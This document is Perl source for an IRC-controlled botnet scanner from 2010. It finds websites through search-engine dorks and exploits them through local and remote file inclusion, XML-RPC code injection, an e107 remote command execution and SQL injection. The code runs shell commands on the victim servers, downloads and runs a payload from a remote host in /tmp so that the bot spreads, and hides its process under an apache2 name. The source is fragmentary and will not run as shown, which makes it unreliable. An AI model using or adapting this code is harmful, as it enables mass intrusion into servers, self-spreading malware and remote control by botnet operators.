## ##
## 17/06/2010 ##
## Author : LOADER CoMMuNiTy ##
## Team : Irc.jogjacodex.com ##
## Regrets : Voo_Doo ##
## ##
## ## IMPORTANT ## ##
## ## ##
## ##
## Features: ##
## [+]Sql Injection Scanner ##
## [+]e107 Scanner ##
## [+]XML (Extensible Markup Language) Injection Scanner ##
## [+]Remote File Inclusion Scanner ##
## [+]Local File Inclusion Scanner ##
## [+]RCE r107 / LFI / XML ##
## [+]Integrated Shell, so you can execute commands on the server ##
## [+]Spread Mode, to activate or disable Spread Function ##
## ##
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k start";
$ircserver = "irc.jogjacodex.com";
my $ircport = "6667";
my $nickname = "load";
my $ident = "awaw";
my $channel = "#sampah";
my $runner = "loader";
my $fullname = 'LOADER New Scanner';
my $lfi = "!Newlfi";
my $xml = "!Newxml";
my $e107 = "!Newe107";
my $sql = "!Newsql";
my $rfi = "!Newrfi";
my $cmdlfi = "!cmdlfi";
my $cmde107 = "!cmde107";
my $cmdxml = "!cmdxml";
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ";
my $rfiid = "id.jpg";
my $byroesprd = "php.jpg";
my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
$SIG{'PS'} = 'IGNORE';
$ircserver="$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0"x16;;
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
sleep 1;
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick|".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $nickname +Bx");
sendraw("JOIN $channel");
sendraw("PRIVMSG $channel :Hello, I`m Ready To Scanner");
sendraw("PRIVMSG $runner :Hi $runner im here !!!");
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
if ($msg=~ /PRIVMSG $channel :!help/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################## Vuln Scanner ################### ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # ( $rfi/$lfi/$sql/$xml ) [bug] [dork] # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################### RCE Command ################### ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # $e107 [dork] # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################# Execute Command ################# ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # ( $cmde107 /$cmdlfi / $cmdxml ) [target] [cmd] # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################### md5 Command ################### ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # !dec / !enc # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 #################### BOT Info ##################### ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # !respon | !engine | !pid | !version | !about # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################################################### ");
if ($msg=~ /PRIVMSG $channel :!version/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Version 15) 10 Multi Scanner v2 ");
if ($msg=~ /PRIVMSG $channel :!engine/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Engine 15) 10 Google, Bing, AllTheWeb, Altavista, ASK, UOL, Yahoo. ");
if ($msg=~ /PRIVMSG $channel :!pid/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3PID 15) 10 Process/ID : 4 $fakeproc - $$ ");
if ($msg=~ /PRIVMSG $channel :!about/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3About 15) 3 Multi Scanner v2 ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3About 15) 3 Coded by isfan ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3About 15) 3 Copyright © 2010 LOADER CoMMuNiTy ");
##################################################################### CMD IRC
if ($msg=~ /PRIVMSG $channel :!enc\s+(.*)/){
my $enc = $1;
if ($msg=~ /PRIVMSG $channel :!dec\s+(.*)/){
my $dec = $1;
if ($msg=~ /PRIVMSG $channel :!btjoin\s+(.*)/){
my $cnls = $1;
if ($msg=~ /PRIVMSG $channel :!btpart\s+(.*)/){
my $cnls = $1;
if ($msg=~ /PRIVMSG $channel :!okdeh\s+(.*)/){
my $cnls = $1;
if ($msg=~ /PRIVMSG $channel :!respon/){
my $re = query($rfiid);
if ( $re =~ /LOADER/ ) {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Info 15) 3 Response is working ! ");
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Info 15) 3 Response is 4NOT 3 working ! ");
##################################################################### CMD LFI
if ($msg=~ /PRIVMSG $channel :$cmdlfi\s+(.*?)\s+(.*)/){
my $url = $1."../../../../../../../../../../../../../../../proc/self/environ";
my $cmd = $2;
##################### LFI LFI LFI ###################
##################################################################### Google Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15) 7 Search Engine Loading ... ");
##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
##################### XML XML XML ###################
if ($msg=~ /PRIVMSG $channel :$cmdxml\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
##################################################################### GooGle Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15) 7 Search Engine Loading ... ");
##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
##################### RFI RFI RFI ###################
##################################################################### GooGle Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15) 7 Search Engine Loading ... ");
##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
##################### SQL SQL SQL ###################
##################################################################### GooGle Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15) 7 Search Engine Loading ... ");
##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
##################### e107 e107 e107 ###################
##################################################################### GooGle Engine
if ($msg=~ /PRIVMSG $channel :$cmde107\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = "/contact.php";
my $d0rk = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107 15) 7 Search Engine Loading ... ");
##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = "/contact.php";
my $d0rk = $1;
##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = "/contact.php";
my $d0rk = $1;
##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = "/contact.php";
my $d0rk = $1;
##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = "/contact.php";
my $d0rk = $1;
##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = "/contact.php";
my $d0rk = $1;
##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = "/contact.php";
my $d0rk = $1;
for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ##################################################################### Procedure sub cmdlfi() { my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $hie = "j13mbut /dev/stdout\"); ?>j13mbut";
$response = $browser->get( $url );
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
print $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFICMD 15) 4 $1 ");
sub lfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @lfigoogle=&google($dork);
push(@lfitotal, @lfigoogle);
if ($engz =~ /AllTheWeb/) {
my @lfialltheweb=&alltheweb($dork);
push(@lfitotal, @lfialltheweb);
if ($engz =~ /Bing/) {
my @lfiBing=&Bing($dork);
push(@lfitotal, @lfiBing);
if ($engz =~ /ALtaViSTa/) {
my @lfialtavista=&altavista($dork);
push(@lfitotal, @lfialtavista);
if ($engz =~ /AsK/) {
my @lfiask=&ask($dork);
push(@lfitotal, @lfiask);
if ($engz =~ /UoL/) {
my @lfiuol=&uol($dork);
push(@lfitotal, @lfiuol);
if ($engz =~ /YahOo/) {
my @lfiyahoo=&yahoo($dork);
push(@lfitotal, @lfiyahoo);
my @lficlean = &calculate(@lfitotal);
if (scalar(@clean) != 0) {
my $uni=scalar(@lficlean);
foreach my $lfitarget (@lficlean)
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
my $lfi = "../../../../../../../../../../../../../../..";
my $xpl = "http://".$lfitarget.$bugz.$rspo_test;
my $vuln = "http://".$lfitarget." 12".$bugz." 7".$rspo_test." ";
my $re = getcontent($xpl);
if ($re =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $rspo = lfiexploit($xpl,"uname -svnrp;echo J13mb0T;id");
$rspo =~ s/\n//g;
if ($rspo =~ /j13mb0t#(.*)J13mb0Tuid=(.*)#j13mb0t/sg) {
my ($sys,$uid) = ($1,$2);
my $lfispread = "cd /tmp;lwp-download $planetwork -O php.jpg;perl php.jpg;rm -rf *.jpg*;wget $planetwork -O php.jpg;perl php.jpg;rm -rf *.jpg*";
my $tmp = "/tmp/cmd".int rand(2010);
my $upload = lfiexploit($xpl,"wget $rfiid -O $tmp;$lfispread"); sleep(1);
my $res = getcontent("http://".$lfitarget.$bugz.$lfi.$tmp.'');
if ($res =~ /isfan/) {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15)( 4@ 3$engz 15) 15( 13@ 12PHPSheLL 15) 4 http://".$lfitarget." 12".$bugz." 6".$lfi." 7".$tmp." 15( 7@ 3".$sys." 15) ");
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15)( 4@ 3$engz 15) 15( 13@ 12System 15) 4 http://".$lfitarget." 12".$bugz." 6[LFI] 15( 7@ 3".$sys." 7uid=".$uid." 15) ");
else {
} exit } sleep(3);
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "";
$exploit .= "test.method ";
$exploit .= "',''));";
$exploit .= "echo'isfan';echo`".$dwa."`;echo'solo';exit;/* ";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
if ($response->content =~ /isfan(.*)solo/s) {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XMLCMD 15) 4 $1 ");
sub xmlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @xmlgoogle=&google($dork);
push(@xmltotal, @xmlgoogle);
if ($engz =~ /AllTheWeb/) {
my @xmlalltheweb=&alltheweb($dork);
push(@xmltotal, @xmlalltheweb);
if ($engz =~ /Bing/) {
my @xmlBing=&Bing($dork);
push(@xmltotal, @xmlBing);
if ($engz =~ /ALtaViSTa/) {
my @xmlaltavista=&altavista($dork);
push(@xmltotal, @xmlaltavista);
if ($engz =~ /AsK/) {
my @xmlask=&ask($dork);
push(@xmltotal, @xmlask);
if ($engz =~ /UoL/) {
my @xmluol=&uol($dork);
push(@xmltotal, @xmluol);
if ($engz =~ /YahOo/) {
my @xmlyahoo=&yahoo($dork);
push(@xmltotal, @xmlyahoo);
my @xmlclean = &calculate(@xmltotal);
if (scalar(@xmlclean) != 0) {
my $uni=scalar(@xmlclean);
foreach my $xmltarget (@xmlclean)
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
my $xpl = "http://".$xmltarget.$bugz;
my $xmlsprd = "cd /tmp;lwp-download $planetwork -O php.jpg;perl php.jpg;rm -rf *.jpg*;wget $planetwork -O php.jpg;perl php.jpg;rm -rf *.jpg*";
my $strona = getcontent($xpl);
if ( $strona =~ /faultCode/ ) {
sub rfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @rfigoogle=&google($dork);
push(@rfitotal, @rfigoogle);
if ($engz =~ /AllTheWeb/) {
my @rfialltheweb=&alltheweb($dork);
push(@rfitotal, @rfialltheweb);
if ($engz =~ /Bing/) {
my @rfiBing=&Bing($dork);
push(@rfitotal, @rfiBing);
if ($engz =~ /ALtaViSTa/) {
my @rfialtavista=&altavista($dork);
push(@rfitotal, @rfialtavista);
if ($engz =~ /AsK/) {
my @rfiask=&ask($dork);
push(@rfitotal, @rfiask);
if ($engz =~ /UoL/) {
my @rfiuol=&uol($dork);
push(@rfitotal, @rfiuol);
if ($engz =~ /YahOo/) {
my @rfiyahoo=&yahoo($dork);
push(@rfitotal, @rfiyahoo);
my @rficlean = &calculate(@rfitotal);
if (scalar(@rficlean) != 0) {
my $uni=scalar(@rficlean);
foreach my $rfitarget (@rficlean)
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
my $rfixpl = "http://".$rfitarget.$bugz.$rfiid;
my $inj = "http://".$rfitarget." 12".$bugz." 7[PHP-SHELL]? ";
my $re = getcontent($rfixpl);
if ($re =~ /isfan/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15) 2$inj 14 $os ");
sub sqlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @sqlgoogle=&google($dork);
push(@sqltotal, @sqlgoogle);
if ($engz =~ /AllTheWeb/) {
my @sqlalltheweb=&alltheweb($dork);
push(@sqltotal, @sqlalltheweb);
if ($engz =~ /Bing/) {
my @sqlBing=&Bing($dork);
push(@sqltotal, @sqlBing);
if ($engz =~ /ALtaViSTa/) {
my @sqlaltavista=&altavista($dork);
push(@sqltotal, @sqlaltavista);
if ($engz =~ /AsK/) {
my @sqlask=&ask($dork);
push(@sqltotal, @sqlask);
if ($engz =~ /UoL/) {
my @sqluol=&uol($dork);
push(@sqltotal, @sqluol);
if ($engz =~ /YahOo/) {
my @sqlyahoo=&yahoo($dork);
push(@sqltotal, @sqlyahoo);
my @sqlclean = &calculate(@sqltotal);
if (scalar(@sqlclean) != 0) {
my $uni=scalar(@sqlclean);
foreach my $sqltarget (@sqlclean)
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 4@ 3$engz 15) 10 Scan Finish for 14 $dork ");
my $xpl = "http://".$sqltarget.$bugz."'";
my $vuln = "http://".$sqltarget." 12".$bugz." 7[SQL] ";
my $sqlsite = "http://".$sqltarget.$bugz;
my $strona = getcontent($xpl);
if ( $strona =~ m/You have an error in your SQL syntax/i || $strona =~ m/Query failed/i || $strona =~ m/SQL query failed/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2MySQL 15) 14 $vuln ");&sqlbrute($sqlsite);}
elsif ( $strona =~ m/ODBC SQL Server Driver/i || $strona =~ m/Unclosed quotation mark/i || $strona =~ m/Microsoft OLE DB Provider for/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2MsSQL 15) 14 $vuln ");}
elsif ( $strona =~ m/Microsoft JET Database/i || $strona =~ m/ODBC Microsoft Access Driver/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3SQL 15)( 2MsAccess 15) 14 $vuln ");}
sub cmde107() {
my $path = $_[0];
my $incmd = $_[1];
my $codecmd = encode_base64($incmd);
my $cmd = 'echo(base64_decode("aXNmYW4=").shell_exec(base64_decode("aWQ=")).base64_decode("TE9BREVS")).shell_exec(base64_decode("'.$codecmd.'"))';
$access = new LWP::UserAgent;
my $req = new HTTP::Request POST => $path;
my $res = $access->request($req);
my $data = $res->as_string;
if ( $data =~ /LOADER(.*)/ ){
$mydata = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3e107CMD 15) 4 $mydata ");
sub e107scan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @e107google=&google($dork);
push(@e107total, @e107google);
if ($engz =~ /AllTheWeb/) {
my @e107alltheweb=&alltheweb($dork);
push(@e107total, @e107alltheweb);
if ($engz =~ /Bing/) {
my @e107Bing=&Bing($dork);
push(@e107total, @e107Bing);
if ($engz =~ /ALtaViSTa/) {
my @e107altavista=&altavista($dork);
push(@e107total, @e107altavista);
if ($engz =~ /AsK/) {
my @e107ask=&ask($dork);
push(@e107total, @e107ask);
if ($engz =~ /UoL/) {
my @e107uol=&uol($dork);
push(@e107total, @e107uol);
if ($engz =~ /YahOo/) {
my @e107yahoo=&yahoo($dork);
push(@e107total, @e107yahoo);
my @e107clean = &calculate(@e107total);
if (scalar(@e107clean) != 0) {
my $uni=scalar(@e107clean);
foreach my $e107target (@e107clean)
if ($contatore==$uni-1){
